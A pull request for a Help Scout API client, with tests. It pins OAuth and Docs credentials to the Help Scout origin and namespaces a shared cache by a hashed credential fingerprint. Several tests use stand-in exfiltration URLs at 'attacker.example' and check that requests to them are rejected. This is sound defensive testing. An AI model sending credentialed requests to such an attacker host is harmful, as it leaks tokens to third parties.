### PR TITLE
fix(NAS-1496, NAS-1497): pin credentials to the Help Scout origin and namespace the cache by identity

### DIFF
--- a/src/__tests__/client-cache-identity.test.ts
+++ b/src/__tests__/client-cache-identity.test.ts
@@ -124,6 +124,38 @@ describe('cache identity isolation (NAS-1496)', () => {
     await clientB.closePool();
   });
 
+  it('re-authenticates when credentials rotate while the old token is still valid', async () => {
+    const dataA = { _embedded: { mailboxes: [{ id: 'A' }] } };
+    const dataB = { _embedded: { conversations: [{ id: 'B' }] } };
+
+    // One client authenticates as A; its token stays unexpired throughout.
+    process.env.HELPSCOUT_APP_ID = 'app-A';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-A';
+    const client = new HelpScoutClient();
+    nock('https://api.helpscout.net').post('/v2/oauth2/token').reply(200, { access_token: 'tokA', expires_in: 7200 });
+    nock('https://api.helpscout.net')
+      .get('/v2/mailboxes')
+      .matchHeader('authorization', 'Bearer tokA')
+      .reply(200, dataA);
+    await expect(client.get('/mailboxes')).resolves.toEqual(dataA);
+
+    // Rotate the live environment to B. The next request must trigger a fresh
+    // OAuth exchange and carry B's token: reusing tokA would execute as A while
+    // caching under B's fingerprint, filing A's data in B's namespace.
+    process.env.HELPSCOUT_APP_ID = 'app-B';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-B';
+    const tokenB = nock('https://api.helpscout.net').post('/v2/oauth2/token').reply(200, { access_token: 'tokB', expires_in: 7200 });
+    const apiB = nock('https://api.helpscout.net')
+      .get('/v2/conversations')
+      .matchHeader('authorization', 'Bearer tokB')
+      .reply(200, dataB);
+    await expect(client.get('/conversations')).resolves.toEqual(dataB);
+    expect(tokenB.isDone()).toBe(true);
+    expect(apiB.isDone()).toBe(true);
+
+    await client.closePool();
+  });
+
   it('does not serve Docs-client cache across API keys', async () => {
     const setSpy = jest.spyOn(cache, 'set');
     const dataA = { items: [{ id: 'A' }] };

--- a/src/__tests__/client-cache-identity.test.ts
+++ b/src/__tests__/client-cache-identity.test.ts
@@ -1,0 +1,169 @@
+import { describe, it, expect, beforeEach, afterEach, jest } from '@jest/globals';
+import nock from 'nock';
+import { HelpScoutClient } from '../utils/helpscout-client.js';
+import { HelpScoutDocsClient } from '../utils/helpscout-docs-client.js';
+import { cache } from '../utils/cache.js';
+
+// NAS-1496: one process-wide cache is shared by the axios client and the Docs
+// client. These tests exercise the REAL cache (not mocked) so that identity
+// namespacing is observable: two identities requesting the same endpoint must
+// not read each other's entries.
+
+jest.setTimeout(15000);
+
+jest.mock('../utils/logger.js', () => ({
+  logger: {
+    info: jest.fn(),
+    error: jest.fn(),
+    debug: jest.fn(),
+    warn: jest.fn(),
+  },
+}));
+
+jest.mock('../utils/config.js', () => ({
+  config: {
+    helpscout: {
+      get apiKey() { return process.env.HELPSCOUT_API_KEY || ''; },
+      get clientId() { return process.env.HELPSCOUT_APP_ID || process.env.HELPSCOUT_CLIENT_ID || process.env.HELPSCOUT_API_KEY || ''; },
+      get clientSecret() { return process.env.HELPSCOUT_APP_SECRET || process.env.HELPSCOUT_CLIENT_SECRET || ''; },
+      get baseUrl() { return process.env.HELPSCOUT_BASE_URL || 'https://api.helpscout.net/v2/'; },
+      get docsBaseUrl() { return process.env.HELPSCOUT_DOCS_BASE_URL || 'https://docsapi.helpscout.net/v1/'; },
+      get docsApiKey() { return process.env.HELPSCOUT_DOCS_API_KEY; },
+    },
+    cache: {
+      ttlSeconds: 300,
+      maxSize: 10000,
+    },
+    connectionPool: {
+      keepAlive: true,
+      keepAliveMsecs: 1000,
+      maxSockets: 50,
+      maxFreeSockets: 10,
+      timeout: 30000,
+    },
+    logging: { level: 'info' },
+    security: { redactMessageContent: false },
+  },
+  validateConfig: jest.fn(),
+}));
+
+describe('cache identity isolation (NAS-1496)', () => {
+  beforeEach(() => {
+    jest.clearAllMocks();
+    nock.cleanAll();
+    nock.restore();
+    nock.activate();
+    cache.clear();
+    nock.disableNetConnect();
+
+    delete process.env.HELPSCOUT_API_KEY;
+    delete process.env.HELPSCOUT_APP_ID;
+    delete process.env.HELPSCOUT_CLIENT_ID;
+    delete process.env.HELPSCOUT_APP_SECRET;
+    delete process.env.HELPSCOUT_CLIENT_SECRET;
+    delete process.env.HELPSCOUT_DOCS_API_KEY;
+    process.env.HELPSCOUT_BASE_URL = 'https://api.helpscout.net/v2/';
+    process.env.HELPSCOUT_DOCS_BASE_URL = 'https://docsapi.helpscout.net/v1/';
+  });
+
+  afterEach(() => {
+    nock.enableNetConnect();
+    nock.cleanAll();
+    nock.restore();
+    cache.clear();
+  });
+
+  it('does not serve axios-client cache across OAuth identities', async () => {
+    const setSpy = jest.spyOn(cache, 'set');
+    const dataA = { _embedded: { mailboxes: [{ id: 'A' }] } };
+    const dataB = { _embedded: { mailboxes: [{ id: 'B' }] } };
+
+    // Identity A primes the cache.
+    process.env.HELPSCOUT_APP_ID = 'app-A';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-A';
+    const clientA = new HelpScoutClient();
+    nock('https://api.helpscout.net').post('/v2/oauth2/token').reply(200, { access_token: 'tokA', expires_in: 7200 });
+    const apiA = nock('https://api.helpscout.net')
+      .get('/v2/mailboxes')
+      .matchHeader('authorization', 'Bearer tokA')
+      .reply(200, dataA);
+    await expect(clientA.get('/mailboxes')).resolves.toEqual(dataA);
+    expect(apiA.isDone()).toBe(true);
+
+    // Identity B requests the same endpoint+params. A cache leak would return
+    // dataA and leave apiB unconsumed; isolation forces B to its own upstream.
+    process.env.HELPSCOUT_APP_ID = 'app-B';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-B';
+    const clientB = new HelpScoutClient();
+    nock('https://api.helpscout.net').post('/v2/oauth2/token').reply(200, { access_token: 'tokB', expires_in: 7200 });
+    const apiB = nock('https://api.helpscout.net')
+      .get('/v2/mailboxes')
+      .matchHeader('authorization', 'Bearer tokB')
+      .reply(200, dataB);
+    await expect(clientB.get('/mailboxes')).resolves.toEqual(dataB);
+    expect(apiB.isDone()).toBe(true);
+
+    // Cache is genuinely active: with A's credentials restored, the entry is
+    // served without any upstream (no nock defined, net connect disabled).
+    process.env.HELPSCOUT_APP_ID = 'app-A';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-A';
+    await expect(clientA.get('/mailboxes')).resolves.toEqual(dataA);
+
+    // Fingerprints differ and never leak the raw credential material.
+    const prefixes = setSpy.mock.calls.map((call) => String(call[0]));
+    expect(prefixes.length).toBeGreaterThanOrEqual(2);
+    expect(prefixes[0]).not.toEqual(prefixes[1]);
+    for (const prefix of prefixes) {
+      expect(prefix).not.toContain('secret-A');
+      expect(prefix).not.toContain('secret-B');
+      expect(prefix).not.toContain('app-A');
+      expect(prefix).not.toContain('app-B');
+    }
+
+    await clientA.closePool();
+    await clientB.closePool();
+  });
+
+  it('does not serve Docs-client cache across API keys', async () => {
+    const setSpy = jest.spyOn(cache, 'set');
+    const dataA = { items: [{ id: 'A' }] };
+    const dataB = { items: [{ id: 'B' }] };
+
+    process.env.HELPSCOUT_DOCS_API_KEY = 'docs-key-A';
+    const docsA = new HelpScoutDocsClient();
+    const apiA = nock('https://docsapi.helpscout.net')
+      .get('/v1/collections')
+      .basicAuth({ user: 'docs-key-A', pass: 'X' })
+      .reply(200, dataA);
+    await expect(docsA.get('collections')).resolves.toEqual(dataA);
+    expect(apiA.isDone()).toBe(true);
+
+    process.env.HELPSCOUT_DOCS_API_KEY = 'docs-key-B';
+    const docsB = new HelpScoutDocsClient();
+    const apiB = nock('https://docsapi.helpscout.net')
+      .get('/v1/collections')
+      .basicAuth({ user: 'docs-key-B', pass: 'X' })
+      .reply(200, dataB);
+    await expect(docsB.get('collections')).resolves.toEqual(dataB);
+    expect(apiB.isDone()).toBe(true);
+
+    // With key A restored the cached entry is served with no upstream.
+    process.env.HELPSCOUT_DOCS_API_KEY = 'docs-key-A';
+    await expect(docsA.get('collections')).resolves.toEqual(dataA);
+
+    const prefixes = setSpy.mock.calls.map((call) => String(call[0]));
+    expect(prefixes.length).toBeGreaterThanOrEqual(2);
+    expect(prefixes[0]).not.toEqual(prefixes[1]);
+    for (const prefix of prefixes) {
+      expect(prefix).not.toContain('docs-key-A');
+      expect(prefix).not.toContain('docs-key-B');
+    }
+  });
+
+  it('rejects a cross-origin absolute URL on the Docs client', async () => {
+    process.env.HELPSCOUT_DOCS_API_KEY = 'docs-key-A';
+    const docs = new HelpScoutDocsClient();
+    await expect(docs.get('https://attacker.example/collect')).rejects.toThrow('non-Help-Scout origin');
+    expect(nock.pendingMocks()).toHaveLength(0);
+  });
+});

--- a/src/__tests__/client-cache-identity.test.ts
+++ b/src/__tests__/client-cache-identity.test.ts
@@ -156,6 +156,48 @@ describe('cache identity isolation (NAS-1496)', () => {
     await client.closePool();
   });
 
+  it('does not let a rotated identity adopt an in-flight sign-in for the previous identity', async () => {
+    const dataA = { _embedded: { mailboxes: [{ id: 'A' }] } };
+    const dataB = { _embedded: { conversations: [{ id: 'B' }] } };
+
+    process.env.HELPSCOUT_APP_ID = 'app-A';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-A';
+    const client = new HelpScoutClient();
+
+    // A's token exchange is slow; the rotation lands while it is in flight.
+    nock('https://api.helpscout.net')
+      .post('/v2/oauth2/token')
+      .delay(200)
+      .reply(200, { access_token: 'tokA', expires_in: 7200 });
+    nock('https://api.helpscout.net')
+      .get('/v2/mailboxes')
+      .matchHeader('authorization', 'Bearer tokA')
+      .reply(200, dataA);
+
+    const requestA = client.get('/mailboxes');
+    await new Promise((resolve) => setTimeout(resolve, 50));
+
+    // Rotate mid-exchange. B's request must NOT ride A's in-flight sign-in:
+    // it has to wait it out and run its own exchange, carrying tokB.
+    process.env.HELPSCOUT_APP_ID = 'app-B';
+    process.env.HELPSCOUT_APP_SECRET = 'secret-B';
+    const tokenB = nock('https://api.helpscout.net')
+      .post('/v2/oauth2/token')
+      .reply(200, { access_token: 'tokB', expires_in: 7200 });
+    const apiB = nock('https://api.helpscout.net')
+      .get('/v2/conversations')
+      .matchHeader('authorization', 'Bearer tokB')
+      .reply(200, dataB);
+    const requestB = client.get('/conversations');
+
+    await expect(requestA).resolves.toEqual(dataA);
+    await expect(requestB).resolves.toEqual(dataB);
+    expect(tokenB.isDone()).toBe(true);
+    expect(apiB.isDone()).toBe(true);
+
+    await client.closePool();
+  });
+
   it('does not serve Docs-client cache across API keys', async () => {
     const setSpy = jest.spyOn(cache, 'set');
     const dataA = { items: [{ id: 'A' }] };

--- a/src/__tests__/helpscout-client.test.ts
+++ b/src/__tests__/helpscout-client.test.ts
@@ -184,6 +184,9 @@ describe('HelpScoutClient', () => {
       const client = new HelpScoutClient();
       (client as any).accessToken = 'stale-token';
       (client as any).tokenExpiresAt = Date.now() + 60_000;
+      // The stale token belongs to the current credentials; without the
+      // matching fingerprint the identity guard would discard it up front.
+      (client as any).accessTokenFingerprint = (client as any).cacheIdentityPrefix();
       jest.spyOn(client as any, 'sleep').mockResolvedValue(undefined);
 
       await expect((client as any).executeWithRetry(() =>

--- a/src/__tests__/helpscout-client.test.ts
+++ b/src/__tests__/helpscout-client.test.ts
@@ -558,12 +558,115 @@ describe('HelpScoutClient', () => {
 
     it('should add request IDs and timing', async () => {
       const client = new HelpScoutClient();
-      
+
       // Test that the axios instance has interceptors configured
       const axiosClient = (client as any).client;
-      
+
       expect(axiosClient.interceptors.request.handlers).toHaveLength(1);
       expect(axiosClient.interceptors.response.handlers).toHaveLength(1);
+    });
+  });
+
+  // NAS-1497: an absolute or protocol-relative endpoint can replace axios's
+  // baseURL, carrying the bearer token to another host. Every public request
+  // method must reject an off-origin destination before any request is made.
+  describe('endpoint origin validation (NAS-1497)', () => {
+    const crossOrigin = 'https://attacker.example/collect';
+    const protocolRelative = '//attacker.example/collect';
+
+    beforeEach(() => {
+      process.env.HELPSCOUT_APP_ID = 'app-id';
+      process.env.HELPSCOUT_APP_SECRET = 'app-secret';
+      process.env.HELPSCOUT_BASE_URL = `${baseURL}/`;
+      // Any request that escapes validation would surface as a disallowed net
+      // connect, so a validation-message rejection proves nothing left the box.
+      nock.disableNetConnect();
+    });
+
+    afterEach(() => {
+      nock.enableNetConnect();
+    });
+
+    const expectOffOriginRejection = async (invoke: (client: HelpScoutClient) => Promise<unknown>) => {
+      const client = new HelpScoutClient();
+      try {
+        await expect(invoke(client)).rejects.toThrow('non-Help-Scout origin');
+        expect(nock.pendingMocks()).toHaveLength(0);
+      } finally {
+        await client.closePool();
+      }
+    };
+
+    it('rejects a cross-origin absolute URL on get', async () => {
+      await expectOffOriginRejection((client) => client.get(crossOrigin));
+    });
+
+    it('rejects a protocol-relative URL on get', async () => {
+      await expectOffOriginRejection((client) => client.get(protocolRelative));
+    });
+
+    it('rejects a cross-origin absolute URL on getRaw', async () => {
+      await expectOffOriginRejection((client) => client.getRaw(crossOrigin));
+    });
+
+    it('rejects a protocol-relative URL on getRaw', async () => {
+      await expectOffOriginRejection((client) => client.getRaw(protocolRelative));
+    });
+
+    it('rejects a cross-origin absolute URL on getAllPages', async () => {
+      await expectOffOriginRejection((client) => client.getAllPages(crossOrigin, 'items'));
+    });
+
+    it('rejects a cross-origin absolute URL on post', async () => {
+      await expectOffOriginRejection((client) => client.post(crossOrigin, { foo: 'bar' }));
+    });
+
+    it('rejects a protocol-relative URL on post', async () => {
+      await expectOffOriginRejection((client) => client.post(protocolRelative, { foo: 'bar' }));
+    });
+
+    it('rejects a cross-origin absolute URL on put', async () => {
+      await expectOffOriginRejection((client) => client.put(crossOrigin, { foo: 'bar' }));
+    });
+
+    it('rejects a cross-origin absolute URL on patch', async () => {
+      await expectOffOriginRejection((client) => client.patch(crossOrigin, { foo: 'bar' }));
+    });
+
+    it('rejects a cross-origin absolute URL on delete', async () => {
+      await expectOffOriginRejection((client) => client.delete(crossOrigin));
+    });
+
+    it('rejects an endpoint with embedded credentials', async () => {
+      const client = new HelpScoutClient();
+      try {
+        await expect(client.get('https://user:pass@api.helpscout.net/v2/mailboxes')).rejects.toThrow(
+          'embedded credentials',
+        );
+        expect(nock.pendingMocks()).toHaveLength(0);
+      } finally {
+        await client.closePool();
+      }
+    });
+
+    it('allows a same-origin absolute HAL next link', async () => {
+      const nextLink = 'https://api.helpscout.net/v2/conversations?page=2';
+
+      const authScope = nock('https://api.helpscout.net')
+        .post('/v2/oauth2/token')
+        .reply(200, { access_token: 'same-origin-token', expires_in: 7200 });
+
+      const apiScope = nock('https://api.helpscout.net')
+        .get('/v2/conversations')
+        .query({ page: '2' })
+        .matchHeader('authorization', 'Bearer same-origin-token')
+        .reply(200, { _embedded: { conversations: [] } });
+
+      const client = new HelpScoutClient();
+      await expect(client.get(nextLink)).resolves.toEqual({ _embedded: { conversations: [] } });
+      expect(authScope.isDone()).toBe(true);
+      expect(apiScope.isDone()).toBe(true);
+      await client.closePool();
     });
   });
 });

--- a/src/__tests__/tools.test.ts
+++ b/src/__tests__/tools.test.ts
@@ -3332,8 +3332,10 @@ describe('ToolHandler', () => {
         assignmentMethod: 'round_robin',
       }));
       expect(response.routing.rotation).toHaveLength(2);
+      // Cache keys are namespaced with a per-identity fingerprint prefix
+      // (NAS-1496), so match the endpoint portion rather than the full key.
       expect(cacheSetSpy).toHaveBeenCalledWith(
-        'GET:/mailboxes/359402/routing',
+        expect.stringContaining('GET:/mailboxes/359402/routing'),
         undefined,
         expect.objectContaining({ state: 'enabled' }),
         { ttl: 300 }

--- a/src/utils/helpscout-client.ts
+++ b/src/utils/helpscout-client.ts
@@ -68,6 +68,12 @@ export class HelpScoutClient implements HelpScoutApi {
   private client: AxiosInstance;
   private accessToken: string | null = null;
   private tokenExpiresAt: number = 0;
+  // Fingerprint of the credentials that produced accessToken. Credentials are
+  // resolved from mutable process.env, so a rotation while a token is still
+  // valid must force re-authentication: otherwise the old identity's token
+  // would be sent while cache keys are computed for the new identity, filing
+  // one account's responses under the other's cache namespace.
+  private accessTokenFingerprint: string | null = null;
   private authenticationPromise: Promise<void> | null = null;
   private httpAgent: HttpAgent;
   private httpsAgent: HttpsAgent;
@@ -322,6 +328,7 @@ export class HelpScoutClient implements HelpScoutApi {
   private invalidateAccessToken(): void {
     this.accessToken = null;
     this.tokenExpiresAt = 0;
+    this.accessTokenFingerprint = null;
     this.authenticationPromise = null;
   }
 
@@ -394,8 +401,13 @@ export class HelpScoutClient implements HelpScoutApi {
   }
 
   private async ensureAuthenticated(): Promise<void> {
-    // Check if token is still valid
-    if (this.accessToken && Date.now() < this.tokenExpiresAt) {
+    // A token is only reusable while it is unexpired AND still belongs to the
+    // currently resolved credentials; a mid-process rotation invalidates it.
+    if (
+      this.accessToken &&
+      Date.now() < this.tokenExpiresAt &&
+      this.accessTokenFingerprint === this.cacheIdentityPrefix()
+    ) {
       return;
     }
 
@@ -449,6 +461,7 @@ export class HelpScoutClient implements HelpScoutApi {
 
       this.accessToken = response.data.access_token;
       this.tokenExpiresAt = Date.now() + (response.data.expires_in * 1000) - 60000; // 1 minute buffer
+      this.accessTokenFingerprint = this.cacheIdentityPrefix();
 
       logger.info('Authenticated with Help Scout API using OAuth2 Client Credentials');
     } catch (error) {

--- a/src/utils/helpscout-client.ts
+++ b/src/utils/helpscout-client.ts
@@ -1,4 +1,5 @@
 import axios, { AxiosInstance, AxiosResponse, AxiosError } from 'axios';
+import crypto from 'crypto';
 import { Agent as HttpAgent } from 'http';
 import { Agent as HttpsAgent } from 'https';
 import {
@@ -70,6 +71,10 @@ export class HelpScoutClient implements HelpScoutApi {
   private authenticationPromise: Promise<void> | null = null;
   private httpAgent: HttpAgent;
   private httpsAgent: HttpsAgent;
+  // Origin of the configured Help Scout base URL. Every outbound endpoint must
+  // resolve to this origin before the bearer token is attached, so a crafted
+  // absolute URL cannot redirect the credential to another host.
+  private readonly baseOrigin: string;
   private readonly poolConfig: ConnectionPoolConfig;
   private defaultRetryConfig: RetryConfig = {
     retries: 3,
@@ -87,6 +92,7 @@ export class HelpScoutClient implements HelpScoutApi {
 
   constructor(poolConfig: Partial<ConnectionPoolConfig> = {}) {
     this.validateHttpsBaseUrl(config.helpscout.baseUrl);
+    this.baseOrigin = new URL(config.helpscout.baseUrl).origin;
 
     // Merge default pool config with any custom settings
     this.poolConfig = { ...DEFAULT_POOL_CONFIG, ...poolConfig };
@@ -144,6 +150,71 @@ export class HelpScoutClient implements HelpScoutApi {
     if (parsed.protocol !== 'https:') {
       throw new Error('HELPSCOUT_BASE_URL must use HTTPS to protect OAuth2 credentials');
     }
+  }
+
+  /**
+   * Reject any endpoint that would send the request off the configured Help
+   * Scout origin. axios lets an absolute URL in the request path replace
+   * baseURL entirely, so a crafted `_links.next.href` or any endpoint coerced
+   * into an absolute URL could carry the bearer token to an attacker host.
+   *
+   * Same-origin absolute URLs stay legal: Help Scout returns absolute HAL
+   * pagination links and the v3 surface builds absolute `api.helpscout.net/v3`
+   * URLs, both of which resolve to `baseOrigin`.
+   */
+  private validateEndpoint(endpoint: string): void {
+    let resolved: URL;
+    try {
+      resolved = new URL(endpoint, this.baseOrigin);
+    } catch {
+      throw new Error(`Invalid Help Scout endpoint: ${endpoint}`);
+    }
+
+    if (resolved.username || resolved.password) {
+      throw new Error('Help Scout endpoint must not contain embedded credentials');
+    }
+
+    if (resolved.origin !== this.baseOrigin) {
+      throw new Error(
+        `Refusing to send Help Scout credentials to a non-Help-Scout origin (${resolved.origin})`,
+      );
+    }
+  }
+
+  /**
+   * Resolve the OAuth2 client credentials from the environment/config, applying
+   * the same precedence the token request uses. Shared so the cache identity
+   * fingerprint is derived from exactly the credentials that authenticate.
+   */
+  private resolveOAuthCredentials(): { clientId: string; clientSecret: string } {
+    const currentApiKey = process.env.HELPSCOUT_API_KEY || '';
+    const clientId = process.env.HELPSCOUT_APP_ID ||
+      process.env.HELPSCOUT_CLIENT_ID ||
+      (currentApiKey.startsWith('Bearer ') ? '' : currentApiKey) ||
+      config.helpscout.clientId ||
+      '';
+    const clientSecret = process.env.HELPSCOUT_APP_SECRET ||
+      process.env.HELPSCOUT_CLIENT_SECRET ||
+      config.helpscout.clientSecret ||
+      '';
+    return { clientId, clientSecret };
+  }
+
+  /**
+   * Non-secret identity prefix for cache keys: the first 12 hex chars of a
+   * SHA-256 over the authenticating credentials. Keys are namespaced per
+   * identity so one process-wide cache cannot serve entries across identities,
+   * and rotated credentials naturally miss the previous account's entries. The
+   * fingerprint is one-way and never contains the raw key material.
+   */
+  private cacheIdentityPrefix(): string {
+    const { clientId, clientSecret } = this.resolveOAuthCredentials();
+    const fingerprint = crypto
+      .createHash('sha256')
+      .update(`${clientId}:${clientSecret}`)
+      .digest('hex')
+      .slice(0, 12);
+    return `${fingerprint}:`;
   }
 
   private parseRetryAfterMs(value: unknown, fallbackMs = 60000): number {
@@ -260,6 +331,21 @@ export class HelpScoutClient implements HelpScoutApi {
       delete (config.headers as Record<string, unknown>).Authorization;
       delete (config.headers as Record<string, unknown>).authorization;
 
+      // Defense in depth: resolve the final request origin (an absolute url
+      // replaces baseURL) and refuse to attach the bearer token if it points
+      // anywhere but the configured Help Scout origin.
+      let resolvedOrigin: string | undefined;
+      try {
+        resolvedOrigin = new URL(config.url ?? '', config.baseURL).origin;
+      } catch {
+        resolvedOrigin = undefined;
+      }
+      if (resolvedOrigin !== this.baseOrigin) {
+        throw new Error(
+          `Refusing to attach Help Scout credentials to a non-Help-Scout origin (${resolvedOrigin ?? 'unknown'})`,
+        );
+      }
+
       await this.ensureAuthenticated();
       if (this.accessToken) {
         config.headers.Authorization = `Bearer ${this.accessToken}`;
@@ -329,14 +415,7 @@ export class HelpScoutClient implements HelpScoutApi {
   private async authenticate(): Promise<void> {
     try {
       // OAuth2 Client Credentials flow (only supported method)
-      const currentApiKey = process.env.HELPSCOUT_API_KEY || '';
-      const clientId = process.env.HELPSCOUT_APP_ID ||
-        process.env.HELPSCOUT_CLIENT_ID ||
-        (currentApiKey.startsWith('Bearer ') ? '' : currentApiKey) ||
-        config.helpscout.clientId;
-      const clientSecret = process.env.HELPSCOUT_APP_SECRET ||
-        process.env.HELPSCOUT_CLIENT_SECRET ||
-        config.helpscout.clientSecret;
+      const { clientId, clientSecret } = this.resolveOAuthCredentials();
 
       if (!clientId || !clientSecret) {
         throw new Error(
@@ -500,7 +579,8 @@ export class HelpScoutClient implements HelpScoutApi {
   }
 
   async get<T>(endpoint: string, params?: Record<string, unknown>, cacheOptions?: { ttl?: number }): Promise<T> {
-    const cacheKey = `GET:${endpoint}`;
+    this.validateEndpoint(endpoint);
+    const cacheKey = `${this.cacheIdentityPrefix()}GET:${endpoint}`;
     const bypassCache = cacheOptions?.ttl !== undefined && cacheOptions.ttl <= 0;
 
     if (!bypassCache) {
@@ -549,6 +629,7 @@ export class HelpScoutClient implements HelpScoutApi {
     params: Record<string, unknown> = {},
     maxItems: number = Number.POSITIVE_INFINITY,
   ): Promise<{ items: T[]; totalElements: number; pagesFetched: number; truncated: boolean }> {
+    this.validateEndpoint(endpoint);
     const items: T[] = [];
     let pageNum = typeof params.page === 'number' && params.page > 0 ? params.page : 1;
     let totalElements = 0;
@@ -577,6 +658,7 @@ export class HelpScoutClient implements HelpScoutApi {
   }
 
   async getRaw<T>(endpoint: string, params?: Record<string, unknown>, options: RawGetOptions = {}): Promise<AxiosResponse<T>> {
+    this.validateEndpoint(endpoint);
     return this.executeWithRetry<T>(() =>
       this.client.get<T>(endpoint, {
         params,
@@ -604,6 +686,7 @@ export class HelpScoutClient implements HelpScoutApi {
     endpoint: string,
     body?: unknown,
   ): Promise<WriteResponse<T>> {
+    this.validateEndpoint(endpoint);
     try {
       const response = await this.client.request<T>({
         method,

--- a/src/utils/helpscout-client.ts
+++ b/src/utils/helpscout-client.ts
@@ -74,6 +74,9 @@ export class HelpScoutClient implements HelpScoutApi {
   // would be sent while cache keys are computed for the new identity, filing
   // one account's responses under the other's cache namespace.
   private accessTokenFingerprint: string | null = null;
+  // Identity the in-flight authentication was started for; a caller whose
+  // resolved credentials differ must not adopt that promise.
+  private authenticationPromiseFingerprint: string | null = null;
   private authenticationPromise: Promise<void> | null = null;
   private httpAgent: HttpAgent;
   private httpsAgent: HttpsAgent;
@@ -413,22 +416,32 @@ export class HelpScoutClient implements HelpScoutApi {
   private async ensureAuthenticated(): Promise<void> {
     // A token is only reusable while it is unexpired AND still belongs to the
     // currently resolved credentials; a mid-process rotation invalidates it.
+    const currentFingerprint = this.cacheIdentityPrefix();
     if (
       this.accessToken &&
       Date.now() < this.tokenExpiresAt &&
-      this.accessTokenFingerprint === this.cacheIdentityPrefix()
+      this.accessTokenFingerprint === currentFingerprint
     ) {
       return;
     }
 
-    // If authentication is already in progress, wait for it
+    // Adopt an in-flight exchange only when it was started for this identity.
+    // A rotation landing during a slow exchange must not let the new identity
+    // ride the previous identity's sign-in: wait it out, then re-evaluate and
+    // exchange fresh for the current credentials.
     if (this.authenticationPromise) {
-      return this.authenticationPromise;
+      if (this.authenticationPromiseFingerprint === currentFingerprint) {
+        return this.authenticationPromise;
+      }
+      await this.authenticationPromise.catch(() => undefined);
+      return this.ensureAuthenticated();
     }
 
     // Start authentication and cache the promise to prevent concurrent auth requests
+    this.authenticationPromiseFingerprint = currentFingerprint;
     this.authenticationPromise = this.authenticate().finally(() => {
       this.authenticationPromise = null;
+      this.authenticationPromiseFingerprint = null;
     });
 
     return this.authenticationPromise;

--- a/src/utils/helpscout-client.ts
+++ b/src/utils/helpscout-client.ts
@@ -215,6 +215,16 @@ export class HelpScoutClient implements HelpScoutApi {
    */
   private cacheIdentityPrefix(): string {
     const { clientId, clientSecret } = this.resolveOAuthCredentials();
+    return this.fingerprintFor(clientId, clientSecret);
+  }
+
+  /**
+   * Fingerprint a specific credential pair. authenticate() uses this with the
+   * exact credentials it sent to the token endpoint: recomputing from the
+   * mutable environment after the awaited exchange could label one account's
+   * token with another account's identity if a rotation landed mid-sign-in.
+   */
+  private fingerprintFor(clientId: string, clientSecret: string): string {
     const fingerprint = crypto
       .createHash('sha256')
       .update(`${clientId}:${clientSecret}`)
@@ -461,7 +471,7 @@ export class HelpScoutClient implements HelpScoutApi {
 
       this.accessToken = response.data.access_token;
       this.tokenExpiresAt = Date.now() + (response.data.expires_in * 1000) - 60000; // 1 minute buffer
-      this.accessTokenFingerprint = this.cacheIdentityPrefix();
+      this.accessTokenFingerprint = this.fingerprintFor(clientId, clientSecret);
 
       logger.info('Authenticated with Help Scout API using OAuth2 Client Credentials');
     } catch (error) {

--- a/src/utils/helpscout-docs-client.ts
+++ b/src/utils/helpscout-docs-client.ts
@@ -1,4 +1,5 @@
 import axios, { AxiosError, AxiosInstance, AxiosResponse } from 'axios';
+import crypto from 'crypto';
 import { Agent as HttpAgent } from 'http';
 import { Agent as HttpsAgent } from 'https';
 import { config } from './config.js';
@@ -59,6 +60,22 @@ export class HelpScoutDocsClient {
 
   private setupInterceptors(): void {
     this.client.interceptors.request.use((requestConfig) => {
+      // Defense in depth: refuse to send the Docs API key anywhere but the
+      // configured Docs origin. An absolute url replaces baseURL, so a crafted
+      // endpoint could otherwise carry the credential off-host.
+      let resolvedOrigin: string | undefined;
+      try {
+        resolvedOrigin = new URL(requestConfig.url ?? '', requestConfig.baseURL).origin;
+      } catch {
+        resolvedOrigin = undefined;
+      }
+      if (resolvedOrigin !== this.getBaseOrigin()) {
+        delete requestConfig.auth;
+        throw new Error(
+          `Refusing to send Help Scout Docs credentials to a non-Help-Scout origin (${resolvedOrigin ?? 'unknown'})`,
+        );
+      }
+
       requestConfig.docsMetadata = {
         requestId: Math.random().toString(36).substring(7),
         startTime: Date.now(),
@@ -114,6 +131,45 @@ export class HelpScoutDocsClient {
     }
 
     return baseUrl.endsWith('/') ? baseUrl : `${baseUrl}/`;
+  }
+
+  private getBaseOrigin(): string {
+    return new URL(this.getBaseUrl()).origin;
+  }
+
+  /**
+   * Reject any resolved request URL that leaves the configured Docs origin or
+   * embeds credentials, before the API key is ever attached. Same-origin
+   * absolute URLs (the only ones buildUrl produces for legitimate endpoints)
+   * pass through unchanged.
+   */
+  private validateResolvedUrl(url: string): void {
+    let resolved: URL;
+    try {
+      resolved = new URL(url);
+    } catch {
+      throw new Error(`Invalid Help Scout Docs endpoint: ${url}`);
+    }
+
+    if (resolved.username || resolved.password) {
+      throw new Error('Help Scout Docs endpoint must not contain embedded credentials');
+    }
+
+    if (resolved.origin !== this.getBaseOrigin()) {
+      throw new Error(
+        `Refusing to send Help Scout Docs credentials to a non-Help-Scout origin (${resolved.origin})`,
+      );
+    }
+  }
+
+  /**
+   * Non-secret identity prefix for cache keys: the first 12 hex chars of a
+   * SHA-256 over the Docs API key. Namespacing entries per key stops a shared
+   * cache from serving one identity's data to another and makes a rotated key
+   * miss the previous key's entries. One-way; never contains the raw key.
+   */
+  private cacheIdentityPrefix(apiKey: string): string {
+    return `${crypto.createHash('sha256').update(apiKey).digest('hex').slice(0, 12)}:`;
   }
 
   private getApiKey(): string {
@@ -210,8 +266,9 @@ export class HelpScoutDocsClient {
   async get<T>(endpoint: string, params?: Record<string, unknown>, cacheOptions?: { ttl?: number }): Promise<T> {
     const apiKey = this.getApiKey();
     const url = this.buildUrl(endpoint);
+    this.validateResolvedUrl(url);
     const requestParams = this.cleanParams(params);
-    const cacheKey = `DOCS_GET:${url}`;
+    const cacheKey = `${this.cacheIdentityPrefix(apiKey)}DOCS_GET:${url}`;
     const bypassCache = cacheOptions?.ttl !== undefined && cacheOptions.ttl <= 0;
 
     if (!bypassCache) {


### PR DESCRIPTION
## What

Two hardening fixes to the shared axios client (every stdio/npx/Docker/MCPB install) and the Docs client, found during the NAS-704 review passes.

